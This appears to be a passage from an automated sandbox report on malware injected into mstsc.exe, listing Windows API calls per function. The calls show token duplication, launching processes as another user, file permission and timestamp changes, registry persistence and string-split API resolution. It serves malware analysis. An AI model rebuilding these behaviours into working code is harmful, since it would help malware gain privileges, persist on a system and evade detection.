Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1

CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
CloseHandle.KERNEL32(00000000), ref: 0006DA99
GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00066E18, Relevance: 15.1, APIs: 10, Instructions: 81

APIs

Part of subcall function 00066C0B: wsprintfW.USER32 ref: 00066C4D
Part of subcall function 00066C0B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00066C6B
Part of subcall function 00066C0B: CloseHandle.KERNEL32(00000000), ref: 00066C7A

ExitThread.KERNEL32 ref: 00066F17

Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00066E91
GetExitCodeProcess.KERNEL32(?), ref: 00066EA6
Sleep.KERNEL32(00001388), ref: 00066EB1
TerminateProcess.KERNEL32(00000000), ref: 00066EBE
CreateThread.KERNEL32(00000000,00000000,00066E18,?,00000000,00000000), ref: 00066ECE
CloseHandle.KERNEL32(00000000), ref: 00066EDB
CloseHandle.KERNEL32 ref: 00066EE3
FindAtomW.KERNEL32(?), ref: 00066F06
DeleteAtom.KERNEL32(?), ref: 00066F10

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000686AF, Relevance: 15.1, APIs: 10, Instructions: 70

APIs

GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,000677F1,00000000,?), ref: 000686D1
HeapAlloc.KERNEL32(00000000), ref: 000686D8
GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 000686EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006870B
HeapFree.KERNEL32(00000000), ref: 0006870E
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006871A
HeapAlloc.KERNEL32(00000000), ref: 0006871D
GetLastError.KERNEL32 ref: 0006873B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068746
HeapFree.KERNEL32(00000000), ref: 0006874D

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006A626, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107

APIs

GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0006A6B0
HeapAlloc.KERNEL32(00000000), ref: 0006A6B3
GetCurrentThreadId.KERNEL32 ref: 0006A6C5

Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0006A50C
Part of subcall function 0006A4DC: HeapAlloc.KERNEL32(00000000), ref: 0006A50F
Part of subcall function 0006A4DC: GetMessagePos.USER32 ref: 0006A52A
Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006A593
Part of subcall function 0006A4DC: HeapAlloc.KERNEL32(00000000), ref: 0006A596
Part of subcall function 0006A4DC: GetCurrentThreadId.KERNEL32 ref: 0006A5AA
Part of subcall function 0006A4DC: LoadLibraryA.KERNEL32(?), ref: 0006A5D4
Part of subcall function 0006A4DC: GetProcAddress.KERNEL32(00000000), ref: 0006A5DB
Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A5EF
Part of subcall function 0006A4DC: HeapFree.KERNEL32(00000000), ref: 0006A5F2
Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A614
Part of subcall function 0006A4DC: HeapFree.KERNEL32(00000000), ref: 0006A617

GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0006A717
HeapAlloc.KERNEL32(00000000), ref: 0006A71A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A766
HeapFree.KERNEL32(00000000), ref: 0006A76D

Strings

Hrvx, xrefs: 0006A6A3

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00066C88, Relevance: 13.6, APIs: 9, Instructions: 123

APIs

Part of subcall function 000667FB: GetProcessHeap.KERNEL32(00000008,00000089), ref: 000668BE
Part of subcall function 000667FB: HeapAlloc.KERNEL32(00000000), ref: 000668C5
Part of subcall function 000667FB: CountClipboardFormats.USER32 ref: 000668D6
Part of subcall function 000667FB: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006690F
Part of subcall function 000667FB: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00066934
Part of subcall function 000667FB: CloseHandle.KERNEL32(00000000), ref: 00066943
Part of subcall function 000667FB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006694E
Part of subcall function 000667FB: HeapFree.KERNEL32(00000000), ref: 00066955

ExitThread.KERNEL32 ref: 00066E11

Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6

Part of subcall function 000664D2: OpenProcess.KERNEL32(02000000,00000000), ref: 00066529
Part of subcall function 000664D2: ProcessIdToSessionId.KERNEL32(?,?), ref: 00066541
Part of subcall function 000664D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0006655F
Part of subcall function 000664D2: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00066586
Part of subcall function 000664D2: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 000665A6
Part of subcall function 000664D2: AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 000665C0
Part of subcall function 000664D2: GetLengthSid.ADVAPI32(?,?,?), ref: 000665D8
Part of subcall function 000664D2: SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00066604
Part of subcall function 000664D2: CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0006660F
Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00066679
Part of subcall function 000664D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00066680
Part of subcall function 000664D2: GetCaretBlinkTime.USER32 ref: 0006669C
Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 000666FF
Part of subcall function 000664D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00066706
Part of subcall function 000664D2: CreatePopupMenu.USER32 ref: 0006671A
Part of subcall function 000664D2: CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00066777
Part of subcall function 000664D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00066793
Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667A8
Part of subcall function 000664D2: CloseHandle.KERNEL32(00007479), ref: 000667B0
Part of subcall function 000664D2: DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 000667BB
Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667C4
Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000667C9
Part of subcall function 000664D2: HeapFree.KERNEL32(00000000,?,?), ref: 000667D6
Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000667DB
Part of subcall function 000664D2: HeapFree.KERNEL32(00000000,?,?), ref: 000667E2
Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667ED
Part of subcall function 000664D2: CloseHandle.KERNEL32(00000000), ref: 000667F0

Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA

CloseHandle.KERNEL32 ref: 00066DDB

Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0006D7EF
Part of subcall function 0006D768: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0006D7F2
Part of subcall function 0006D768: GetShellWindow.USER32 ref: 0006D803
Part of subcall function 0006D768: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0006D83D
Part of subcall function 0006D768: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0006D86B
Part of subcall function 0006D768: CloseHandle.KERNEL32 ref: 0006D880
Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D88E
Part of subcall function 0006D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D891
Part of subcall function 0006D768: StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0006D89F
Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D8A7
Part of subcall function 0006D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D8AA

Part of subcall function 00069240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00069263
Part of subcall function 00069240: CloseHandle.KERNEL32(00000000), ref: 000693F9

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00066D9C
Sleep.KERNEL32(00001388), ref: 00066DA7
TerminateProcess.KERNEL32(00000000), ref: 00066DB4
CreateThread.KERNEL32(00000000,00000000,00066C88,?,00000000,00000000), ref: 00066DC6
CloseHandle.KERNEL32(00000000), ref: 00066DD3
FindAtomW.KERNEL32(?), ref: 00066E00
DeleteAtom.KERNEL32(?), ref: 00066E0A

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006D8BA, Relevance: 13.6, APIs: 9, Instructions: 84

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
FreeSid.ADVAPI32(00000000), ref: 0006D95A
LocalFree.KERNEL32(00000000), ref: 0006D96F
LocalFree.KERNEL32(00000000), ref: 0006D976

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006DD0B, Relevance: 13.6, APIs: 9, Instructions: 72

APIs

Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44

Part of subcall function 0006DAD5: GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0006DAF2
Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0006DBA6
Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DBAD
Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DBB6

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
CloseHandle.KERNEL32(00000000), ref: 0006DD9C
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
HeapFree.KERNEL32(00000000), ref: 0006DDB0

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006E684, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 31

APIs

GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
GetProcAddress.KERNEL32(00000000), ref: 0006E6C4

Strings

el32, xrefs: 0006E6A0
.dll, xrefs: 0006E6A7
nfo, xrefs: 0006E6B6
kern, xrefs: 0006E698

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000633F3, Relevance: 9.1, APIs: 6, Instructions: 100

APIs

WSAStartup.WS2_32(00000201,?), ref: 00063419

Part of subcall function 00064521: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
Part of subcall function 00064521: GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
Part of subcall function 00064521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
Part of subcall function 00064521: GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
Part of subcall function 00064521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
Part of subcall function 00064521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
Part of subcall function 00064521: GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
Part of subcall function 00064521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
Part of subcall function 00064521: HeapAlloc.KERNEL32(00000000), ref: 00064608
Part of subcall function 00064521: GetCapture.USER32 ref: 00064617
Part of subcall function 00064521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
Part of subcall function 00064521: LocalFree.KERNEL32(76AD46E9), ref: 0006465B
Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
Part of subcall function 00064521: HeapFree.KERNEL32(00000000), ref: 0006466B
Part of subcall function 00064521: GlobalFree.KERNEL32(00000000), ref: 00064675
Part of subcall function 00064521: CloseHandle.KERNEL32(000619F5), ref: 0006467F

SetEvent.KERNEL32 ref: 00063443
ExitThread.KERNEL32 ref: 0006344B

Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063E42
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00063ED2
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063ED9
Part of subcall function 00063E17: GetTickCount.KERNEL32 ref: 00063EED
Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063F24
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063F6E
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 00063F71
Part of subcall function 00063E17: GetCaretBlinkTime.USER32 ref: 00063F86
Part of subcall function 00063E17: wsprintfW.USER32 ref: 00063FC8
Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0006401D
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0006402C
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006402F
Part of subcall function 00063E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00064051
Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 00064077
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00064099
Part of subcall function 00063E17: HeapAlloc.KERNEL32(00000000), ref: 0006409C
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 000640AE
Part of subcall function 00063E17: HeapReAlloc.KERNEL32(00000000), ref: 000640B1
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000640D5
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640D8
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 000640E4
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 000640ED
Part of subcall function 00063E17: RegCloseKey.ADVAPI32(?), ref: 000640FC
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00064107
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 0006410A
Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00064112
Part of subcall function 00063E17: HeapFree.KERNEL32(00000000), ref: 00064115

SetEvent.KERNEL32 ref: 00063486

Part of subcall function 00063199: GetProcessHeap.KERNEL32(00000008,00000029), ref: 00063209
Part of subcall function 00063199: HeapAlloc.KERNEL32(00000000), ref: 00063210
Part of subcall function 00063199: GetCapture.USER32 ref: 0006321F
Part of subcall function 00063199: Sleep.KERNEL32(-0000EA60), ref: 000632C2
Part of subcall function 00063199: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000632E9
Part of subcall function 00063199: HeapFree.KERNEL32(00000000), ref: 000632F0

Sleep.KERNEL32(-0000EA60), ref: 00063534

Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0006BA29
Part of subcall function 0006B9E6: HeapAlloc.KERNEL32(00000000), ref: 0006BA2C
Part of subcall function 0006B9E6: GetShellWindow.USER32 ref: 0006BA40
Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006BA9F
Part of subcall function 0006B9E6: HeapAlloc.KERNEL32(00000000), ref: 0006BAA2
Part of subcall function 0006B9E6: GetMessageTime.USER32 ref: 0006BAB6
Part of subcall function 0006B9E6: GetModuleHandleA.KERNEL32(?,00000000), ref: 0006BAE7
Part of subcall function 0006B9E6: GetProcAddress.KERNEL32(00000000), ref: 0006BAEE
Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BB23
Part of subcall function 0006B9E6: HeapFree.KERNEL32(00000000), ref: 0006BB2C
Part of subcall function 0006B9E6: GetProcessHeap.KERNEL32(00000000,?), ref: 0006BB31
Part of subcall function 0006B9E6: HeapFree.KERNEL32(00000000), ref: 0006BB34

Part of subcall function 00062915: Sleep.KERNEL32(00002710,?,00000000,?,?), ref: 00062938

Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00063B01
Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063B04
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00063BC8
Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063BCB
Part of subcall function 00063ADC: GetTickCount.KERNEL32 ref: 00063BDF
Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063C16
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063C56
Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063C59
Part of subcall function 00063ADC: GetCaretBlinkTime.USER32 ref: 00063C6D
Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063CB2
Part of subcall function 00063ADC: RegDeleteValueW.ADVAPI32(?,?), ref: 00063CC5
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063CD4
Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063CD7
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00063D22
Part of subcall function 00063ADC: HeapAlloc.KERNEL32(00000000), ref: 00063D25
Part of subcall function 00063ADC: GetCaretBlinkTime.USER32 ref: 00063D39
Part of subcall function 00063ADC: wsprintfW.USER32 ref: 00063D7E
Part of subcall function 00063ADC: RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00063DAE
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063DC6
Part of subcall function 00063ADC: HeapFree.KERNEL32(00000000), ref: 00063DC9
Part of subcall function 00063ADC: RegCloseKey.ADVAPI32(?), ref: 00063DEA
Part of subcall function 00063ADC: GetProcessHeap.KERNEL32(00000000,?), ref: 00063DF5
